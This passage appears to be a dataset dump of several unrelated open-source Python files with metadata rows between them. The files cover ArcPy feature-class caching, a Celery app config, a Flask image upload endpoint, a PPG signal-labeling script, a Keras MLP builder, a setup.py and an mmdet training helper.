        self.featureClassLocation, self.name = os.path.split(target)
        existingFields = [f.name for f in arcpy.ListFields(target)]
        # Keep user-managed fields, shape fields, and object-ID fields;
        # everything else is dropped and rebuilt from the service schema.
        fieldsToRemove = [x for x in existingFields if x not in userFields and "shape" not in x.lower(
        ) and "objectid" not in x.lower() and "oid" not in x.lower()]
        arcpy.DeleteField_management(target, fieldsToRemove)
        self.__createFields()
        return target

    def __createFields(self):
        """Helper function to create fields when running createFeatureClass method"""
        for field in self.updateFields:
            self.__createField(field)

    def __createField(self, field):
        """Helper function to create individual field when running createFeatureClass method"""
        name = field['name']
        fType = field['type']
        fieldLength = None
        if 'shape' in name.lower():
            # Geometry is created with the feature class itself.
            return
        elif "String" in fType:
            fieldType = "TEXT"
            fieldLength = field['length']
        elif "Date" in fType:
            fieldType = "DATE"
        elif "SmallInteger" in fType:
            fieldType = "SHORT"
        elif "Integer" in fType:
            fieldType = "LONG"
        elif "Double" in fType:
            fieldType = "DOUBLE"
        elif "Single" in fType:
            fieldType = "FLOAT"
        else:
            fieldType = "Unknown"
        featureClass = self.featureClassLocation + "\\" + self.name
        validatedName = arcpy.ValidateFieldName(
            name, self.featureClassLocation)
        arcpy.AddField_management(
            in_table=featureClass, field_name=name, field_type=fieldType, field_length=fieldLength)

    def __configDebug(self, debug, debugLoc):
        """Allows user to write some progress indicators to a log file"""
        if debug:
            self.debugMode = True
            module = os.path.basename(sys.argv[0])
            if module == '':
                # Interactive session: no script name, timestamp the log file.
                module = 'restcache{}.log'.format(str(datetime.datetime.now()))
            else:
                module = module.replace(".py", ".log")
            logging.basicConfig(filename=os.path.join(debugLoc, module), level=logging.INFO)
            logging.log(20, "Starting script at %s" % datetime.datetime.now())
        else:
            self.debugMode = False

    def __logMsg(self, level, *messages):
        """Handles logging"""
        if self.debugMode:
            for message in messages:
                # Single parenthesized argument: valid as a Py2 print
                # statement and a Py3 print call alike.
                print("{}: {}".format(logging.getLevelName(level), message))
                logging.log(level, message)

    def updateFeatureClass(self, featureClass, query=["1=1"], append=False, userFields=[], excludeFields=[], debug=False, debugLoc=sys.path[0]):
        """Primary method to update an existing feature class by scraping Esri's REST endpoints.
        Method iterates over queries so user can specify non-overlapping queries to break up
        ingestion. Method checks that the schemas of the source and destination match,
        ignoring fields in userFields parameter"""
        # config debug mode or not
        self.__configDebug(debug, debugLoc)
        # check if user fields already exist
        if not self.userFields:
            self.userFields = userFields
        if not self.excludeFields:
            self.excludeFields = excludeFields
        # check for errors
        if not validWorkspace(featureClass):
            raise IncorrectWorkspaceType(
                "Incorrect workspace - feature class must be created in a local geodatabase")
        if not self.__matchSchema(featureClass):
            raise SchemaMismatch("Schema of input feature class does not match object schema")
        queries = self.__generateQuery(query)
        cursor = None
        # iterate over queries
        for query in queries:
            self.__logMsg(20, "Working on %s" % query)
            recordsInQuery = self.__getNumRecordsFromQuery(query)
            if recordsInQuery == 0:
                self.__logMsg(30, 'Skipping query')
                continue
            elif self.__numRecordsMoreThanMax(recordsInQuery):
                del cursor
                raise TooManyRecords("Query returns more than max allowed. Please refine query: " + query)
            # else do the rest
            rValues = {"where": query,
                       "f": "json",
                       "returnCountOnly": "false",
                       "outFields": "*"}
            featureData = self.__getEsriRESTJSON(self.url + "/query", rValues, useIjson=False)
            # maybe - unless ijson was used and query was bad
            self.__logMsg(20, "Successfully returned data")
            # Append or overwrite mode - deletion is deferred until the first
            # successful fetch, which prevents wiping the feature class when
            # the service is unavailable.
            if all([not append, not cursor]):
                self.__logMsg(20, "Deleting records")
                arcpy.DeleteFeatures_management(featureClass)
            # instantiate cursor - if there is already a cursor, do nothing
            if not cursor:
                self.__logMsg(20, "Instantiating cursor")
                updateFields = [f['name'] for f in self.updateFields]
                cursor = arcpy.da.InsertCursor(featureClass, updateFields)
            for feature in featureData:
                # if geometry is bad, skip record
                try:
                    geom = self.__getGeometry(feature['geometry'])
                except NullGeometryError as e:
                    self.__logMsg(30, "Null geometry error")
                    continue
                except:
                    self.__logMsg(30, "Some other geometry error - couldn't get geometry")
                    continue
                attributes = []
                attributes.append(geom)
                for field in self.updateFields:
                    if field['name'] == "Shape@":
                        # Geometry already occupies position 0.
                        continue
                    else:
                        attributes.append(self.__getFieldFromFeature(feature, field))
                cursor.insertRow(attributes)
            self.__logMsg(20, "Finished writing data for query: %s" % query)
        # Delete cursor so arcpy releases its lock on the feature class.
        del cursor

    def __getFieldFromFeature(self, feature, field):
        """Extract one attribute value from a service feature, coercing dates
        and oversized integers; returns None when the field is absent."""
        if 'date' in field['type'].lower():
            return self.__handleDateAttribute(feature['attributes'][field['name']])
        else:
            # Getting strange OverflowError "Python int too large to convert
            # to C long", so casting; some services omit fields from results,
            # hence the try/except block.
            try:
                newAttribute = feature['attributes'][field['name']]
                if type(newAttribute) is long:
                    self.__logMsg(20, "Attribute is of type long")
                    if type(int(newAttribute)) is long:
                        return float(newAttribute)
                    else:
                        return newAttribute
                else:
                    return newAttribute
            except KeyError:
                self.__logMsg(40, "Key error in attributes")
                return None

    def __generateQuery(self, query):
        """Generates array of queries to send to endpoint from the function parameter"""
        if query is None:
            return ["1=1"]
        elif type(query) is not list:
            return [query]
        else:
            return query

    # Function to handle a date attribute (often passed as a UNIX timestamp)
    def __handleDateAttribute(self, timeString):
        """Based on length of Unix time string, returns the correct date"""
        try:
            if len(str(timeString)) == 13:
                # 13 digits => milliseconds since the epoch.
                return datetime.datetime.fromtimestamp(timeString / 1000)
            else:
                return datetime.datetime.fromtimestamp(timeString)
        except ValueError:
            return None
        except TypeError:
            return None

    def __matchSchema(self, featureClass):
        """Matches schema of featureClass to the RestCache object so updating can continue"""
        fClassFields = []
        for field in arcpy.ListFields(featureClass):
            fieldName = field.name.lower()
            if fieldName == 'objectid' or fieldName == 'oid' or 'shape' in fieldName or field.name in self.userFields:
                pass
            else:
                fClassFields.append(field.name)
        fClassFields.insert(0, 'Shape@')
        objFields = [f['name'] for f in self.updateFields]
        # Order-insensitive comparison: the insert cursor is built from
        # self.updateFields, so only membership has to match.
        if sorted(fClassFields) == sorted(objFields):
            return True
        else:
            nonFields = [fname for fname in objFields if not fname in fClassFields]
            self.__logMsg(40, "Schema of input feature class does not match object schema", "Fields not in feature class but in feature service", str(nonFields))
            return False

    def __numRecordsMoreThanMax(self, numRecords):
        """Check record count is less than the maximum possible to prevent an incomplete cache"""
        return numRecords > self.maxRecordCount

    def __getNumRecordsFromQuery(self, query="1=1"):
        """Return number of records from REST endpoint based on query"""
        self.__logMsg(20, "Checking number of records in query")
        rValues = {"where": query, "f": "json", "returnCountOnly": "true"}
        count = self.__getEsriRESTJSON(self.url + "/query", rValues)
        numRecords = count['count']
        self.__logMsg(20, "Query contains %d records" % numRecords)
        return numRecords

    def __getGeometry(self, geom):
        """Function to return the Arcpy geometry type to be inserted in the update list"""
        if "POLYGON" in self.geometryType:
            rings = geom['rings']
            polygon = getMultiGeometry(rings)
            polyGeom = arcpy.Polygon(polygon, self.sr)
            return polyGeom
        elif "POLYLINE" in self.geometryType:
            paths = geom['paths']
            polyline = getMultiGeometry(paths)
            lineGeom = arcpy.Polyline(polyline, self.sr)
            return lineGeom
        elif "POINT" in self.geometryType:
            try:
                point = arcpy.Point(float(geom['x']), float(geom['y']))
            except:
                raise NullGeometryError("Point geometry is invalid or null")
            pointGeom = arcpy.Geometry("point", point, self.sr)
            return pointGeom
| 42.374118 | 194 | 0.597812 |
ace07cc39207013795311a5f0f3e65d89975286c | 1,685 | py | Python | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 4 | 2018-03-01T10:22:30.000Z | 2020-04-04T16:31:11.000Z | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 60 | 2018-05-20T04:42:32.000Z | 2022-02-10T17:03:37.000Z | src/bitcaster/celery.py | bitcaster-io/bitcaster | 9f1bad96e00e3bc78a22451731e231d30662b166 | [
"BSD-3-Clause"
] | 1 | 2018-08-04T05:06:45.000Z | 2018-08-04T05:06:45.000Z | import os
import celery
from celery.apps.worker import Worker
from celery.signals import celeryd_after_setup
from django.conf import settings
from bitcaster.config.environ import env
from bitcaster.state import state
class BitcasterCelery(celery.Celery):
    # Dotted path telling Celery which Task subclass to use for every task.
    task_cls = 'bitcaster.celery:BitcasterTask'
# class TaskRouter:
# def route_for_task(self, task, *args, **kwargs):
# if ':' not in task:
# return {'queue': 'celery'}
# namespace, _ = task.split(':')
# return {'queue': namespace}
class BitcasterTask(celery.Task):
    # Transparent pass-through override: currently adds no behaviour, but
    # keeps a single hook point for later customisation of task dispatch.
    def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, shadow=None,
                    **options):
        return super().apply_async(args, kwargs, task_id, producer, link, link_error, shadow, **options)
# Make sure the Django settings module is resolvable before the Celery app
# configures itself from it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bitcaster.config.settings')

app = BitcasterCelery('bitcaster',
                      loglevel='error',
                      broker=env.str('CELERY_BROKER_URL'))

# Pull every CELERY_*-prefixed entry from django.conf.settings.
app.config_from_object('django.conf:settings', namespace='CELERY', force=True)

# celery_once configuration: Redis-backed locks (same backend as the 'lock'
# cache) with a one-hour default lock timeout.
app.conf.ONCE = {
    'backend': 'celery_once.backends.Redis',
    'settings': {
        'url': settings.CACHES['lock']['LOCATION'],
        'default_timeout': 60 * 60
    }
}

# Discover tasks both in every installed Django app and in this package.
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
app.autodiscover_tasks(lambda: ['bitcaster'])
@app.task(bind=True)
def debug_task(self):
    # Minimal smoke-test task: prints its own request context.
    print('Request: {0!r}'.format(self.request))
@celeryd_after_setup.connect
def setup_state(instance: Worker, conf, **kwargs):
    # Deferred import so Django models are not loaded before the worker is set up.
    from bitcaster.models import Organization
    # NOTE(review): assumes a single-organization deployment — the first row
    # is treated as *the* organization; confirm if multi-org is ever needed.
    state.data['organization'] = Organization.objects.first()
| 28.559322 | 119 | 0.687834 |
ace07cf6c1d3ad5833a7ffb0ca58568344b485aa | 1,798 | py | Python | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 5 | 2020-02-13T15:25:37.000Z | 2021-05-06T21:05:14.000Z | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 28 | 2019-11-12T14:14:08.000Z | 2022-03-11T16:29:27.000Z | sampledb/frontend/markdown_images.py | nilsholle/sampledb | 90d7487a3990995ca2ec5dfd8b59d4739d6a9a87 | [
"MIT"
] | 8 | 2019-12-10T15:46:02.000Z | 2021-11-02T12:24:52.000Z | # coding: utf-8
"""
There are several Markdown editors built into the SampleDB frontend, which
need to be able to upload images. This module allows uploading images which
are then assigned a random file name and can be used in the Markdown editors
using that name.
"""
import base64
import os
import flask
import flask_login
from . import frontend
from ..logic import markdown_images
# NOTE(review): appears unused in this module — possibly a leftover from an
# earlier in-memory implementation; confirm before removing.
_temporary_markdown_images = {}

# Accepted image file extensions mapped to the MIME type served for them.
IMAGE_FORMATS = {
    '.png': 'image/png',
    '.jpg': 'image/jpeg',
    '.jpeg': 'image/jpeg',
}
@frontend.route('/markdown_images/<file_name>')
@flask_login.login_required
def markdown_image(file_name):
    """Serve a previously uploaded Markdown image belonging to the current user."""
    content = markdown_images.get_markdown_image(file_name, flask_login.current_user.id)
    if content is None:
        return flask.abort(404)
    extension = os.path.splitext(file_name)[1]
    mime_type = IMAGE_FORMATS.get(extension, 'application/octet-stream')
    return flask.Response(content, mimetype=mime_type)
@frontend.route('/markdown_images/', methods=['POST'])
@flask_login.login_required
def upload_markdown_image():
    """Accept a base64 data-URL image upload and return its serving URL."""
    image_data_url = flask.request.get_data()
    # Find which supported content type the data URL declares. The request
    # body is bytes, so the candidate prefixes are assembled as bytes too.
    for image_file_extension, image_content_type in IMAGE_FORMATS.items():
        image_data_url_prefix = b'data:' + image_content_type.encode('ascii') + b';base64,'
        if image_data_url.startswith(image_data_url_prefix):
            image_base64_data = image_data_url[len(image_data_url_prefix):]
            break
    else:
        # for/else: no supported prefix matched -> reject the upload.
        return flask.abort(400)
    try:
        image_data = base64.b64decode(image_base64_data)
    except Exception:
        # Malformed base64 payload -> reject the upload.
        return flask.abort(400)
    file_name = markdown_images.store_temporary_markdown_image(image_data, image_file_extension, flask_login.current_user.id)
    return flask.url_for('.markdown_image', file_name=file_name)
| 31.54386 | 125 | 0.735818 |
ace07e1e1a1e54556eef076d957ba33761f9a769 | 6,101 | py | Python | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | 9 | 2017-10-26T08:20:57.000Z | 2019-06-02T14:18:19.000Z | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | null | null | null | label_data.py | get/PPG-Pattern-Recognition | 3c2200ad4d914af0b52ae330f0d6bf66dfb64a5c | [
"MIT"
] | 4 | 2017-07-18T09:49:56.000Z | 2019-01-15T02:04:01.000Z | # Script used to label the dataset files (data/data*.csv), call using the -h
# option for information.
# The program extracts preliminary features from the data, then sorts the
# results by feature importance and plots them in batches. Segments can be
# labeled by clicking on subplots.
import sys
import numpy as np
import pandas as pd
import argparse
from datetime import datetime
import glob
sys.path.append('lib')
import detect_peaks
from sklearn import preprocessing
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.patches import Rectangle
from peakutils.peak import indexes
from classes.Signal import Signal
from classes.DataSource import DataSource
# Parse arguments
data_file_id_choices = list(range(len(glob.glob("data/data*.csv"))))
parser = argparse.ArgumentParser(description='Label the dataset for training. \
A call should supply a data file index (e.g. 0 for ./data/data0.csv) and the label \
type (+/-). Figures of signal segment plots will be displayed, ordered by features that \
correlate with high signal to noise ratio. Labels for each signal segment \
are generated by clicking on the respective plot. The file ID, start, and end \
indices of the segment will be appended as a single new line in \
positive_ranges.csv or negative_ranges.csv, depending on the supplied label type.')
# NOTE(review): default=20 is inert here — argparse ignores the default when
# required=True; consider dropping one of the two.
parser.add_argument('--file_id', type=int, default=20, required=True,
                    choices=data_file_id_choices,
                    help='data file index (e.g. 0 for ./data/data0.csv)')
parser.add_argument('--label_type', type=str, default="+", required=True,
                    choices=["+","-","positive","negative"],
                    help='e.g. +/-/positive/negative')
args = parser.parse_args()
FILE_ID = args.file_id
LABEL_TYPE = args.label_type
# Normalize shorthand symbols to the words used in the output file names.
LABEL_TYPE = LABEL_TYPE.replace("+", "positive").replace("-", "negative")
# Helper functions
def onclick(event):
    """Matplotlib click handler: label the clicked subplot's signal segment.

    Relies on the module-level ``fig``, ``subplots`` and ``LABEL_TYPE``
    globals. The first click inside an unlabeled subplot appends the
    segment's [file_id, start, end] row to data/<label>_ranges.csv, marks
    the subplot as used and overlays a confirmation text.
    """
    # Convert the click from display coordinates to figure-fraction
    # coordinates so it can be matched against each subplot's bounding box.
    fx, fy = fig.transFigure.inverted().transform((event.x,event.y))
    for i, subplot in enumerate(subplots):
        if subplot["pos"].contains(fx,fy) and subplot["used"] == False:
            range_ids = pd.DataFrame([subplot["range"]])
            # Append the labeled range as one CSV row (no header, no index).
            range_ids.to_csv('data/%s_ranges.csv' % LABEL_TYPE,
                             mode='a', header=False, index=False)
            subplots[i]["used"] = True
            # Draw a "Labeled ..." marker centered on the clicked subplot.
            fig.text(np.mean([subplot["pos"].x1,subplot["pos"].x0])-0.01,
                     np.mean([subplot["pos"].y1,subplot["pos"].y0]),
                     'Labeled %s' % LABEL_TYPE,
                     horizontalalignment='center',
                     verticalalignment='center',
                     color="green",
                     backgroundcolor="white",
                     fontsize=14)
            fig.canvas.draw()
            break
# Load the selected data file plus any ranges that were already labeled in
# previous sessions (used later to grey out already-labeled subplots).
ds = DataSource()
dataset = ds.read_data_from_file(FILE_ID)
labeled_ds_pos = pd.read_csv('data/positive_ranges.csv',
                             header=None,
                             names=["file_id", "start", "end"])
labeled_ds_neg = pd.read_csv('data/negative_ranges.csv',
                             header=None,
                             names=["file_id", "start", "end"])

# Slide a non-overlapping window of 256 samples over the recording and
# extract a preliminary feature vector for every segment.
step = 256
offset = 0
start, end = offset, dataset.shape[0]
features = []
while start+step < end:
    signal = Signal(dataset.iloc[start:start+step].ppg.values,
                    dataset.iloc[start:start+step].timestamp.values)
    # Heart-rate range validation is only meaningful for positive labeling.
    feature_vector = signal.extract_features(validate_HR_range = (True if LABEL_TYPE=="positive" else False))
    if feature_vector != None:
        features.append(feature_vector + [signal,start,start+step])
    start += step

# Sort by features in ascending order, in order of feature importance
# (VLF/LF, HF/LF, peak_var, mean_HF).
columns = ["mean_HF", "HF/LF", "VLF/LF", "peak_var", "signal", "start", "end"]
sort_column_order = [columns[i] for i in [2,1,3,0]]
features = pd.DataFrame(features, columns=columns).sort_values(sort_column_order, ascending=True)

# Plotting batch size and loop counters for the figure pages below.
num_figure_subplots = 30
counter = 0
k = 0
# Show the sorted segments in pages of 30 subplots (max 100 pages); each
# figure stays open until closed, and clicks are handled by onclick above.
while num_figure_subplots*k < features.shape[0] and k < 100:
    fig = plt.figure(k+1, figsize=(15, 10))
    subplots = []
    for i in range(num_figure_subplots):
        feat = features.iloc[num_figure_subplots*k+i]
        signal = feat.signal
        start = feat.start
        end = feat.end
        # NOTE(review): `signal` is rebound to the scaled high-pass output
        # here, yet Signal methods are still called on it below — this only
        # works if Signal subclasses ndarray / scale preserves it; confirm
        # against the Signal class API.
        signal = preprocessing.scale(signal.highpass_filter(1))
        signal_filtered = preprocessing.scale(signal.bandpass_filter(0.8, 2.5))
        # Build a datetime x-axis spanning the segment.
        start_time = pd.Timestamp(signal.timestamp_in_datetime(0))
        end_time = pd.Timestamp(signal.timestamp_in_datetime(-1))
        t = np.linspace(start_time.value, end_time.value, step)
        t = pd.to_datetime(t)
        ax = plt.subplot(num_figure_subplots/3,3,i+1)
        alpha = 1
        used = False
        label = None
        # Grey out and annotate segments that were labeled in a previous run.
        if labeled_ds_pos.isin([FILE_ID, start, end]).all(1).any():
            label = "+"
        if labeled_ds_neg.isin([FILE_ID, start, end]).all(1).any():
            label = "-"
        if label != None:
            alpha = 0.35
            ax.text(0.5, 0.5,'Already labeled %s' % label,
                    horizontalalignment='center',
                    verticalalignment='center',
                    transform=ax.transAxes,
                    fontsize=14)
            used = True
        # Record this subplot's screen position and segment range so the
        # click handler can map a click back to a segment.
        subplots.append({"pos":ax.get_position(),
                         "range":[FILE_ID, start, end],
                         "used":used,
                         "figure_id":k+1})
        # Raw (blue) and band-passed (red) traces on the same axes.
        ax.plot(t, preprocessing.scale(signal), alpha=alpha)
        ax.plot(t, preprocessing.scale(signal_filtered), color='r', alpha=alpha)
        ax.xaxis_date()
        ax.xaxis.set_major_formatter(mdates.DateFormatter('%H:%M:%S'))
        ax.yaxis.set_visible(False)
    cid = fig.canvas.mpl_connect('button_press_event', onclick)
    # Try the backend-specific ways of maximizing the window, most common
    # first; fall through silently if none are supported.
    figManager = plt.get_current_fig_manager()
    try:
        figManager.window.showMaximized()
    except:
        try:
            figManager.full_screen_toggle()
        except:
            try:
                figManager.window.state('zoomed')
            except:
                pass
    plt.show()
    counter += num_figure_subplots
    k += 1
| 38.371069 | 109 | 0.627438 |
ace07e330acf3a1c770bc1112a27284e2d2e8eef | 6,733 | py | Python | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | 3 | 2021-04-09T08:45:04.000Z | 2021-12-06T12:00:18.000Z | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | null | null | null | gnn2/MLP.py | vishalbelsare/GNN_tf_2.x | 4b6429ed58f2c0922257600a9287d5cc5a10395b | [
"BSD-3-Clause"
] | 2 | 2020-11-23T09:57:00.000Z | 2021-03-24T05:37:13.000Z | from __future__ import annotations
from typing import Union, Optional
from numpy import array, arange
from tensorflow.keras.layers import Dense, Dropout, AlphaDropout, BatchNormalization
from tensorflow.keras.models import Sequential
# ---------------------------------------------------------------------------------------------------------------------
def MLP(input_dim: int, layers: list[int], activations, kernel_initializer, bias_initializer,
        kernel_regularizer=None, bias_regularizer=None, dropout_rate: Union[list[float], float, None] = None,
        dropout_pos: Optional[Union[list[int], int]] = None, alphadropout: bool = False, batch_normalization: bool = True):
    """ Quick building function for MLP model. All lists must have the same length
    :param input_dim: (int) specify the input dimension for the model
    :param layers: (int or list of int) specify the number of units in every layer
    :param activations: (functions or list of functions)
    :param kernel_initializer: (initializers or list of initializers) for weights initialization (NOT biases)
    :param bias_initializer: (initializers or list of initializers) for biases initialization (NOT weights)
    :param kernel_regularizer: (regularizer or list of regularizers) for weight regularization (NOT biases)
    :param bias_regularizer: (regularizer or list of regularizers) for biases regularization (NOT weights)
    :param dropout_rate: (float) s.t. 0 <= dropout_rate <= 1 for dropout rate
    :param dropout_pos: int or list of int describing dropout layers position
    :param alphadropout: (bool) for dropout type, if any
    :param batch_normalization: (bool) add a BatchNormalization layer after the last dense layer
    :return: Sequential (MLP) model
    """
    # check type — use identity comparison for None (fix: was `== None`).
    # If either dropout spec is missing, dropout is disabled entirely.
    if dropout_rate is None or dropout_pos is None: dropout_rate, dropout_pos = list(), list()
    # build lists: broadcast any scalar argument to a per-layer list.
    if type(activations) != list: activations = [activations for _ in layers]
    if type(kernel_initializer) != list: kernel_initializer = [kernel_initializer for _ in layers]
    if type(bias_initializer) != list: bias_initializer = [bias_initializer for _ in layers]
    if type(kernel_regularizer) != list: kernel_regularizer = [kernel_regularizer for _ in layers]
    if type(bias_regularizer) != list: bias_regularizer = [bias_regularizer for _ in layers]
    if type(dropout_pos) == int: dropout_pos = [dropout_pos]
    if type(dropout_rate) == float: dropout_rate = [dropout_rate for _ in dropout_pos]
    # check lengths: all per-layer lists must agree.
    if len(set(map(len, [activations, kernel_initializer, bias_initializer, kernel_regularizer, bias_regularizer, layers]))) > 1:
        raise ValueError('Dense parameters must have the same length to be correctly processed')
    if len(dropout_rate) != len(dropout_pos):
        raise ValueError('Dropout parameters must have the same length to be correctly processed')
    # Dense layers: one kwargs dict per Dense layer.
    keys = ['units', 'activation', 'kernel_initializer', 'bias_initializer', 'kernel_regularizer', 'bias_regularizer']
    vals = zip(layers, activations, kernel_initializer, bias_initializer, kernel_regularizer, bias_regularizer)
    params = [dict(zip(keys, i)) for i in vals]
    # Dropout layers: shift the requested positions to account for the
    # dropout entries inserted before them, then splice them in.
    if dropout_rate and dropout_pos:
        dropout_pos = list(array(dropout_pos) + arange(len(dropout_pos)))
        for i, elem in enumerate(dropout_rate): params.insert(dropout_pos[i], {'rate': elem})
    # set input shape for first layer
    params[0]['input_shape'] = (input_dim,)
    # return MLP model — dicts with a 'units' key become Dense layers,
    # the rest become (Alpha)Dropout layers.
    dropout = AlphaDropout if alphadropout else Dropout
    mlp_layers = [Dense(**i) if 'units' in i else dropout(**i) for i in params]
    if batch_normalization: mlp_layers += [BatchNormalization()]
    return Sequential(mlp_layers)
# ---------------------------------------------------------------------------------------------------------------------
def get_inout_dims(net_name: str, dim_node_label: int, dim_arc_label: int, dim_target: int, problem_based: str, dim_state: int,
                   hidden_units: Union[None, int, list[int]],
                   *, layer: int = 0, get_state: bool = False, get_output: bool = False) -> tuple[int, list[int]]:
    """ Calculate input and output dimension for the MLP of state and output
    :param net_name: (str) in ['state','output']
    :param dim_node_label: (int) dimension of node label
    :param dim_arc_label: (int) dimension of arc label
    :param dim_target: (int) dimension of target
    :param problem_based: (str) s.t. len(problem_based) in [1,2] -> [{'a','n','g'} | {'1','2'}]
    :param dim_state: (int)>=0 for state dimension parameter of the gnn
    :param hidden_units: (int or list of int) for specifying units on hidden layers
    :param layer: (int) LGNN USE: get the dims at gnn of the layer <layer>, from graph dims on layer 0. Default is 0, since GNN==LGNN in this case
    :param get_state: (bool) LGNN USE: set accordingly to LGNN behaviour, if gnns get state, output or both from previous layer
    :param get_output: (bool) LGNN USE: set accordingly to LGNN behaviour, if gnns get state, output or both from previous layer
    :return: (tuple) (input_shape, layers) s.t. input_shape (int) is the input shape for mlp, layers (list of ints) defines hidden+output layers
    """
    assert layer >= 0
    assert problem_based in ['a', 'n', 'g']
    assert dim_state >= 0
    DS = dim_state
    NL, AL, T = dim_node_label, dim_arc_label, dim_target
    # if LGNN, get MLPs layers for gnn in layer 2+: effective label sizes grow
    # with the state/output forwarded from the previous layer. Booleans are
    # used as 0/1 multipliers throughout.
    if layer > 0:
        GS, GO = get_state, get_output
        if DS != 0:
            NL = NL + DS * GS + T * (problem_based != 'a') * GO
            AL = AL + T * (problem_based == 'a') * GO
        else:
            NL = NL + layer * NL * GS + ((layer - 1) * GS + 1) * T * (problem_based != 'a') * GO
            AL = AL + T * (problem_based == 'a') * GO
    # MLP state: one arc label plus source/destination (node label + state).
    if net_name == 'state':
        input_shape = AL + 2 * (NL + DS)
        output_shape = DS if DS else NL
    # MLP output — consistency fix: use DS throughout (was `dim_state`,
    # which is the same value under a second name).
    elif net_name == 'output':
        input_shape = (problem_based == 'a') * (NL + AL + DS) + NL + DS
        output_shape = T
    # possible values for net_name in ['state','output'], otherwise raise error
    else:
        raise ValueError(':param net_name: not in [\'state\', \'output\']')
    # hidden part: normalize hidden_units into a list and append the output layer.
    if hidden_units is None or type(hidden_units) == int and hidden_units <= 0: hidden_units = []
    if type(hidden_units) == list:
        layers = hidden_units + [output_shape]
    else:
        layers = [hidden_units, output_shape]
    return input_shape, layers
| 54.739837 | 147 | 0.651418 |
ace07ee0437215235a9fa11693eb2f210ab3b5aa | 1,396 | py | Python | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | setup.py | nizamarusada/python-mailchimp | e67ba19848d1975d2b142fab960633fc3df8dff4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
README = os.path.join(os.path.dirname(__file__), 'README.rst')

# When running tests using tox, README.md is not found; fall back to an
# empty long description rather than failing the build.
long_description = ''
try:
    with open(README) as readme_file:
        long_description = readme_file.read()
except Exception:
    pass

setup(
    name='mailchimp3',
    version='3.0.6',
    description='A python client for v3 of MailChimp API',
    long_description=long_description,
    url='https://github.com/charlesthk/python-mailchimp',
    author='Charles TISSIER',
    author_email='charles@vingtcinq.io',
    license='MIT',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.6',
    ],
    keywords='mailchimp api v3 client wrapper',
    packages=find_packages(),
    install_requires=['requests>=2.7.0'],
    # test_suite='tests',
)
| 31.727273 | 71 | 0.637536 |
ace0800c5470fbcdd36a04d2322d618354aa9f67 | 3,978 | py | Python | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | mmdet/apis/train.py | Qianna00/InstanceLoc | de6bf95f482c04f3b9af4434feff6a38646e0a87 | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
import torch
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import (DistSamplerSeedHook, EpochBasedRunner, OptimizerHook,
build_optimizer)
from mmdet.core import DistEvalHook, EvalHook
from mmdet.datasets import build_dataloader, build_dataset
from mmdet.utils import get_root_logger
def set_random_seed(seed, deterministic=False):
    """Seed every random number generator used during training.

    Seeds Python's ``random`` module, NumPy and PyTorch (CPU and all CUDA
    devices) with the same value so that runs are reproducible.

    Args:
        seed (int): Seed to be used.
        deterministic (bool): Whether to set the deterministic option for
            the CUDNN backend, i.e., set
            ``torch.backends.cudnn.deterministic`` to True and
            ``torch.backends.cudnn.benchmark`` to False. Default: False.
    """
    for seeder in (random.seed, np.random.seed,
                   torch.manual_seed, torch.cuda.manual_seed_all):
        seeder(seed)
    if not deterministic:
        return
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
def train_detector(model,
                   dataset,
                   cfg,
                   distributed=False,
                   validate=False,
                   timestamp=None,
                   meta=None):
    """Build data loaders, wrap the model for (distributed) training and run
    an epoch-based training loop.

    Args:
        model (nn.Module): The detector to train.
        dataset (Dataset | list[Dataset]): Training dataset(s); a single
            dataset is wrapped into a one-element list.
        cfg (mmcv.Config): Full training config; ``data``, ``optimizer``,
            hook, workflow and resume/load settings are all read from it.
        distributed (bool): Whether to train with
            MMDistributedDataParallel instead of MMDataParallel.
        validate (bool): Accepted for API compatibility but unused here --
            no evaluation hook is registered in this implementation.
        timestamp (str, optional): Run timestamp, attached to the runner so
            the .log and .log.json filenames match.
        meta (dict, optional): Extra metadata forwarded to the runner.
    """
    logger = get_root_logger(cfg.log_level)
    # prepare data loaders
    dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
